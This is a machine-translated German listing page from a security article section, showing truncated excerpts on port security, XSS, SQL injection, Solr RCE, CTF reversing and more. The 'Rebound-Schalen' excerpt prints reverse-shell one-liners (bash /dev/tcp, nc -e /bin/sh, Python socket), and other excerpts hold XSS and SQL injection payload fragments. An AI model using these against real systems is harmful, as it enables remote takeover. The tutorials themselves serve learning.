aktueller Standort:Heim > Technische Artikel > Betrieb und Instandhaltung > Sicherheit

  • Was ist die H3C-Portsicherheitstechnologie?
    Was ist die H3C-Portsicherheitstechnologie?
    Da sich das Internet heutzutage immer weiter entwickelt, ist Sicherheit ein Thema, dem Aufmerksamkeit geschenkt werden muss. Es gibt viele Verhaltensweisen, die Switch-Ports in Unternehmen gefährden, wie z. B. unbefugte Benutzer-Hosts, die sich zufällig mit dem Unternehmensnetzwerk verbinden. Wenn Mitarbeiter beispielsweise eigene Laptops besitzen, können sie ohne Zustimmung des Administrators das Netzwerkkabel eines bestimmten Hosts abziehen, es an den mitgebrachten Laptop anschließen und ihn dann mit dem Unternehmensnetzwerk verbinden. Es ist sehr wahrscheinlich, dass vertrauliche Informationen verloren gehen. Ein weiteres Beispiel ist die Installation von Hubs und anderen Netzwerkgeräten ohne Zustimmung. Um die Anzahl der Netzwerkterminals zu erhöhen, werden einige Mitarbeiter dies ohne Genehmigung tun. Schließen Sie Geräte wie Hubs und Switches an die Büronetzwerkschnittstelle an. In diesem Fall erhöht sich der Datenverkehr der Switch-Schnittstelle, die dieser Netzwerkschnittstelle entspricht.
    Sicherheit 1103 2023-05-19 12:46:46
  • IPSec-Instanzanalyse basierend auf GRE
    IPSec-Instanzanalyse basierend auf GRE
    IPSecoverGRE
    Sicherheit 998 2023-05-19 12:40:06
  • Wie wird der kleine Test von xss durchgeführt?
    Wie wird der kleine Test von xss durchgeführt?
    Es gibt keine Sicherheitseinschränkungen, verwenden Sie einfach warning(/xss/); Einschränkungen: Es kann nur CSS verwendet werden, HTML-Tags sind nicht zulässig, aber es kann nur unter IE getestet werden Führen Sie den folgenden Test bitte im IE6 aus. body{black;xss:alert(/xss/));/*Getestet unter IE6*/}Einschränkungen: HTML wird maskiert und das Image-Tag ist verfügbar. Die im Rahmen des Tests eingegebenen Zeichen werden in die Quelladresse eingefügt, was mithilfe eines Pseudoprotokolls umgangen werden kann. Geben Sie direkt warning(/xss/) ein, oder Sie können Ereignisse verwenden, um es zu umgehen, wie folgt: 1&quo
    Sicherheit 995 2023-05-19 11:37:06
  • Beispielanalyse des erneuten Auftretens einer Bash-Schwachstelle
    Beispielanalyse des erneuten Auftretens einer Bash-Schwachstelle
    BourneAgainShell (kurz BASH) ist die beliebteste SHELL-Implementierung unter GNU/Linux. Sie wurde 1980 geboren. Nach jahrzehntelanger Entwicklung hat sie sich von einem einfachen Terminal-Befehlszeileninterpreter zu einer multifunktionalen Schnittstelle entwickelt, die tief in das GNU-System integriert ist . . Bash, eine Art Unix-Shell. Die erste offizielle Version wurde 1989 veröffentlicht. Ursprünglich war die Verwendung auf dem GNU-Betriebssystem geplant, sie kann jedoch auf den meisten Unix-ähnlichen Betriebssystemen ausgeführt werden, einschließlich Linux und MacOSXv10.4, die es als Standard-Shell verwenden. Es wurde auch auf Cygwin und MinGW unter Microsoft Windows portiert oder kann unter MS- verwendet werden.
    Sicherheit 1292 2023-05-19 11:13:11
  • Wie Zabbix Traceroute-Daten überwacht
    Wie Zabbix Traceroute-Daten überwacht
    1. Zabbixserver und Proxy installieren das mtrmtr-Skript und platzieren es im folgenden Pfad von zabbixserver und Proxy: Führen Sie chownzabbix:zabbixmtrtrace.shzabbix aus, um die mtrtrace-Vorlage zu erstellen: 5. Ordnen Sie den Host der Vorlage zu und beobachten Sie die Daten in zabbix: [Überwachung ]-[aktuelle Daten]:
    Sicherheit 930 2023-05-19 11:10:12
  • Beispielanalyse der RCE-Schwachstelle durch Apache Solr-Velocity-Template-Injection
    Beispielanalyse der RCE-Schwachstelle durch Apache Solr-Velocity-Template-Injection
    0x01 Einführung Solr ist ein unabhängiger Suchanwendungsserver auf Unternehmensebene, der eine API-Schnittstelle ähnlich einem Webdienst bereitstellt. Benutzer können XML-Dateien in einem bestimmten Format über HTTP-Anfragen an den Suchmaschinenserver senden, um Indizes zu generieren. Sie können auch Suchanfragen über HttpGet-Operationen stellen und Ergebnisse im XML-Format erhalten. 0x02 Sicherheitslücke Einführung Die VelocityResponseWriter-Komponente ist in Solr vorhanden. Ein Angreifer kann eine spezifische Anfrage zum Ändern der relevanten Konfiguration erstellen, sodass die VelocityResponseWriter-Komponente das Laden der angegebenen Vorlage ermöglicht, was wiederum dazu führt, dass die Velocity-Vorlage eine Sicherheitslücke bei der Remote-Befehlsausführung einfügt. Dies nutzt der Angreifer aus
    Sicherheit 999 2023-05-19 10:37:13
  • Analyse eines Beispiels für die Nutzung der JIRA-Schwachstelle für den Zugriff auf das nicht klassifizierte Internet Protocol-Router-Netzwerk des US-Militärs
    Analyse eines Beispiels für die Nutzung der JIRA-Schwachstelle für den Zugriff auf das nicht klassifizierte Internet Protocol-Router-Netzwerk des US-Militärs
    Im Folgenden wird beschrieben, wie der Autor am öffentlichen Testprojekt „Hack the Pentagon“ der Schwachstelle des US-Verteidigungsministeriums (DoD) teilnahm und die JIRA-Schwachstelle CVE-2017-9506 nutzte, um eine SSRF-Angriffsoberfläche zu erstellen und Zugriff auf das nichtvertrauliche Internet des US-Militärs zu erhalten Protocol Router Network (NIPRnet) und in Kombination mit anderen Schwachstellentechniken wurden eine Reihe vertraulicher Informationen des DoD-Intranetsystems abgerufen. Aufgrund der Vertraulichkeit des Testprozesses und -inhalts geht dieser Artikel nur auf diesen Punkt ein, ohne zu viele technische Details und detaillierte Szenarien preiszugeben. Er dient nur zum Lernen und Teilen, und ich hoffe, dass die Leser Verständnis haben. JIRA ist ein hervorragendes Softwaretool zur Problemverfolgung und -verwaltung, das von der australischen Firma Atlassian entwickelt wurde. Es kann verschiedene Arten von Problemen verfolgen und verwalten.
    Sicherheit 1058 2023-05-18 22:29:09
  • Welche Arten der SQL-Injection gibt es?
    Welche Arten der SQL-Injection gibt es?
    Vorwort SQL-Injection-Angriffsmethoden können basierend auf der Anwendung, die den von der Datenbank zurückgegebenen Inhalt verarbeitet, in explizite Injektion, Fehlerinjektion und blinde Injektion unterteilt werden. Angreifer mit expliziter Injektion können den gewünschten Inhalt direkt aus dem aktuellen Schnittstelleninhalt abrufen. Das von der Fehlerinjektionsdatenbankabfrage zurückgegebene Ergebnis wird nicht auf der Seite angezeigt, aber die Anwendung druckt die Datenbankfehlerinformationen auf der Seite aus, sodass der Angreifer eine Datenbankfehleranweisung erstellen und den gewünschten Inhalt aus den Fehlerinformationen erhalten kann. Ergebnisse der Blind-Injection-Datenbankabfrage können nicht über die intuitive Seite abgerufen werden. Der Angreifer erhält den gewünschten Inhalt, indem er die Datenbanklogik verwendet oder die Ausführung der Datenbankbibliothek verzögert. Mysql manuelle Injektion kombinierte Injektion?id=1'orderby4--
    Sicherheit 2092 2023-05-18 22:05:12
  • Was sind die Rebound-Schalen?
    Was sind die Rebound-Schalen?
    1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
    Sicherheit 2088 2023-05-18 22:01:04
  • So verwenden Sie das neue APT-Framework DarkPulsar der NSA
    So verwenden Sie das neue APT-Framework DarkPulsar der NSA
    Vorwort Im März 2017 veröffentlichte ShadowBrokers ein vertrauliches Dokument, das die Welt schockierte und zwei Frameworks enthielt: DanderSpritz und FuzzBunch. DanderSpritz besteht vollständig aus Plugins und wird verwendet, um Informationen zu sammeln, Schwachstellen auszunutzen und übernommene Geräte zu manipulieren. Es ist in Java geschrieben und bietet eine grafische Oberfläche ähnlich dem Botnet-Verwaltungspanel und ein Control Panel ähnlich dem Metasploit-Tool. Es enthält auch Hintertüren und Plugins für nicht von FuzzBunch gesteuerte Geräte. Übersicht über die DanderSprit-Schnittstelle Fuzzbunch bietet ein Framework für die Interaktion und Zusammenarbeit verschiedener Dienstprogramme, einschließlich verschiedener Arten von Plug-Ins.
    Sicherheit 1301 2023-05-18 20:14:58
  • So analysieren Sie die Schwachstelle der Ghostscript SAFER-Sandbox-Umgehung
    So analysieren Sie die Schwachstelle der Ghostscript SAFER-Sandbox-Umgehung
    Vorwort Ghostscript ist eine Interpretersoftware für die Adobe PostScript-Sprache. Es kann in der PostScript-Sprache zeichnen und unterstützt die Konvertierung zwischen PS und PDF. Derzeit ist es standardmäßig in den meisten Linux-Distributionen installiert und wurde auf Unix, MacOS, Windows und andere Plattformen portiert. Ghostscript wird auch von Programmen wie ImagineMagic, PythonPIL und verschiedenen PDF-Readern verwendet. Beschreibung der Schwachstelle Am 21. August hat der Google-Sicherheitsforscher Tavis Ormandy mehrere GhostScript-Schwachstellen offengelegt, die durch die Erstellung bösartiger PostScript-Skripte in Bildern umgangen werden können
    Sicherheit 1440 2023-05-18 19:10:39
  • DDCTF2019两个逆向分别是什么
    DDCTF2019两个逆向分别是什么
    01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
    Sicherheit 1438 2023-05-18 17:13:20
  • Analyse von Beispielen für die Umgehung von Beschränkungen und den Zugriff auf die internen Verwaltungssysteme von Google
    Analyse von Beispielen für die Umgehung von Beschränkungen und den Zugriff auf die internen Verwaltungssysteme von Google
    Als ich eines Tages nach Sicherheitslücken bei Google suchte, entdeckte ich einige IP-Adressen von Googles eigenen Diensten aufgrund öffentlicher Sicherheitslücken. Zuerst wusste ich wirklich nicht, was diese IP-Adressen bewirken könnten. Ich habe diese IP-Adressen zunächst überprüft und außerdem festgestellt, dass sie einige der internen IP-Adressen von Google enthielten. Mir fiel plötzlich ein, dass mein Freund KLSREERAM kürzlich eine Sicherheitslücke im Zusammenhang mit der internen IP von Google gemeldet hatte und ein anderer Freund Vishnu eine Sicherheitslücke gemeldet hatte, die Google-Subdomains für den Zugriff auf das Control Panel nutzte. Derzeit wurden beide Schwachstellen von Google behoben und auf die internen IP-Adressen im Zusammenhang mit diesen beiden Schwachstellen kann nicht über das Internet zugegriffen werden. Aber jetzt, da ich mehrere interne IP-Adressen von Google vor mir habe, muss ich einen Weg finden, herauszufinden, ob ich das kann
    Sicherheit 1097 2023-05-18 15:19:49
  • So implementieren Sie eine Schwachstellenanalyse der Disk Pulse Enterprise Window-Anwendung
    So implementieren Sie eine Schwachstellenanalyse der Disk Pulse Enterprise Window-Anwendung
    1. Einführung in die Sicherheitslücke DiskPulseEnterprise ist eine Software, die Festplattenänderungen überwacht. Sie kann die Software über einen Verwaltungsport 9120 oder ein Webverwaltungsfenster 80 verbinden und verwalten, um Festplattenänderungen zu überwachen. In DiskPulse Enterprise gibt es eine dynamische Linkbibliothek, die einige für HTTP-Vorgänge verantwortliche Funktionen enthält. Das Problem tritt bei der Verarbeitung der Postdaten auf, da es keine strikte Längenkontrolle für die Postdaten gibt Beim Ausführen der erfassten Daten werden Daten in den ungültigen Speicher kopiert, was zu einem Pufferüberlauf führt, eine SEH-Verarbeitung mit abnormalem Verhalten auslöst und schließlich EIP steuert, um beliebigen Code auszuführen. Software-Download-Link: h
    Sicherheit 1092 2023-05-18 15:04:07
  • Was ist der Hauptgrund für den Absturz der APP?
    Was ist der Hauptgrund für den Absturz der APP?
    1. Welche Art von Szenarien verursachen wahrscheinlich Abstürze? Kürzlich habe ich darüber nachgedacht, welche Art von Problemen wahrscheinlich zu Unfällen führen – also abnormales Denken. Ich habe zum Beispiel eine amerikanische Fernsehserie mit dem Titel „The Rookie“ gesehen " Erst vor zwei Tagen. „Polizei“, es gibt eine Szene, in der es dem Protagonisten John Nolan nicht gelingt, das Auto des Flüchtigen mit einem Polizeiauto anzuhalten, wodurch der Flüchtige entkommen kann. Welche Verbindung besteht zwischen dieser Szene und dem Test? Erstens vermeiden normale Menschen Kollisionen mit anderen, wenn sie auf der Straße fahren. Dies ist wie der Hauptprozess beim Testen einer Funktion, aber der Polizist wird alles tun, was nötig ist, um ihn zu fangen Bei allen Methoden handelt es sich um abnormales Denken während des Testprozesses, das Nachdenken darüber, wie die Funktion bedient werden soll, um die Verwendung zu erschweren. Leitfaden 1. Abnormale Vorgänge Verschiedene abnormale Vorgänge
    Sicherheit 2466 2023-05-18 13:55:06

Werkzeugempfehlungen

Kontaktcode für das jQuery-Enterprise-Nachrichtenformular

Der Kontaktcode für das jQuery-Unternehmensnachrichtenformular ist ein einfacher und praktischer Unternehmensnachrichtenformular- und Kontaktcode für die Einführungsseite.

Wiedergabeeffekte für HTML5-MP3-Spieluhren

Der Spezialeffekt „HTML5 MP3-Musikbox-Wiedergabe“ ist ein MP3-Musikplayer, der auf HTML5+CSS3 basiert, um niedliche Musikbox-Emoticons zu erstellen und auf die Schaltfläche „Umschalten“ zu klicken.

HTML5 coole Partikelanimations-Navigationsmenü-Spezialeffekte

Der Spezialeffekt „HTML5 Cool Particle Animation“ für das Navigationsmenü ist ein Spezialeffekt, der seine Farbe ändert, wenn die Maus über das Navigationsmenü bewegt wird.
Menünavigation
2024-02-29

Drag-and-Drop-Bearbeitungscode für visuelle jQuery-Formulare

Der Drag-and-Drop-Bearbeitungscode für visuelle jQuery-Formulare ist eine visuelle Form, die auf jQuery und dem Bootstrap-Framework basiert.

Webvorlage für Bio-Obst- und Gemüselieferanten Bootstrap5

Eine Webvorlage für Bio-Obst- und Gemüselieferanten – Bootstrap5
Bootstrap-Vorlage
2023-02-03

Bootstrap3 multifunktionale Dateninformations-Hintergrundverwaltung, responsive Webseitenvorlage – Novus

Bootstrap3 multifunktionale Dateninformations-Hintergrundverwaltung, responsive Webseitenvorlage – Novus
Backend-Vorlage
2023-02-02

Webseitenvorlage für die Immobilienressourcen-Serviceplattform Bootstrap5

Webseitenvorlage für die Immobilienressourcen-Serviceplattform Bootstrap5
Bootstrap-Vorlage
2023-02-02

Einfache Webvorlage für Lebenslaufinformationen Bootstrap4

Einfache Webvorlage für Lebenslaufinformationen Bootstrap4
Bootstrap-Vorlage
2023-02-02

可爱的夏天元素矢量素材(EPS+PNG)

这是一款可爱的夏天元素矢量素材,包含了太阳、遮阳帽、椰子树、比基尼、飞机、西瓜、冰淇淋、雪糕、冷饮、游泳圈、人字拖、菠萝、海螺、贝壳、海星、螃蟹、柠檬、防晒霜、太阳镜等等,素材提供了 EPS 和免扣 PNG 两种格式,含 JPG 预览图。
PNG material
2024-05-09

四个红的的 2023 毕业徽章矢量素材(AI+EPS+PNG)

这是一款红的的 2023 毕业徽章矢量素材,共四个,提供了 AI 和 EPS 和免扣 PNG 等格式,含 JPG 预览图。
PNG material
2024-02-29

唱歌的小鸟和装满花朵的推车设计春天banner矢量素材(AI+EPS)

这是一款由唱歌的小鸟和装满花朵的推车设计的春天 banner 矢量素材,提供了 AI 和 EPS 两种格式,含 JPG 预览图。
Banner image
2024-02-29

金色的毕业帽矢量素材(EPS+PNG)

这是一款金色的毕业帽矢量素材,提供了 EPS 和免扣 PNG 两种格式,含 JPG 预览图。
PNG material
2024-02-27

Website-Vorlage für Reinigungs- und Reparaturdienste für Inneneinrichtungen

Die Website-Vorlage für Reinigungs- und Wartungsdienste für Heimdekoration ist ein Website-Vorlagen-Download, der sich für Werbewebsites eignet, die Heimdekorations-, Reinigungs-, Wartungs- und andere Dienstleistungsorganisationen anbieten. Tipp: Diese Vorlage ruft die Google-Schriftartenbibliothek auf und die Seite wird möglicherweise langsam geöffnet.
Frontend-Vorlage
2024-05-09

Persönliche Lebenslauf-Leitfaden-Seitenvorlage in frischen Farben

Die Vorlage „Fresh Color Matching“ für die Lebenslauf-Leitfadenseite für persönliche Bewerbungen ist eine persönliche Webvorlage zum Herunterladen von Lebensläufen für die Jobsuche, die für einen frischen Farbabstimmungsstil geeignet ist. Tipp: Diese Vorlage ruft die Google-Schriftartenbibliothek auf und die Seite wird möglicherweise langsam geöffnet.
Frontend-Vorlage
2024-02-29

Web-Vorlage für kreativen Job-Lebenslauf für Designer

Die Webvorlage „Designer Creative Job Resume“ ist eine herunterladbare Webvorlage für die Anzeige persönlicher Lebensläufe, die für verschiedene Designerpositionen geeignet ist. Tipp: Diese Vorlage ruft die Google-Schriftartenbibliothek auf und die Seite wird möglicherweise langsam geöffnet.
Frontend-Vorlage
2024-02-28

Website-Vorlage eines modernen Ingenieurbauunternehmens

Die Website-Vorlage für moderne Ingenieur- und Bauunternehmen ist eine herunterladbare Website-Vorlage, die sich zur Förderung der Ingenieur- und Baudienstleistungsbranche eignet. Tipp: Diese Vorlage ruft die Google-Schriftartenbibliothek auf und die Seite wird möglicherweise langsam geöffnet.
Frontend-Vorlage
2024-02-28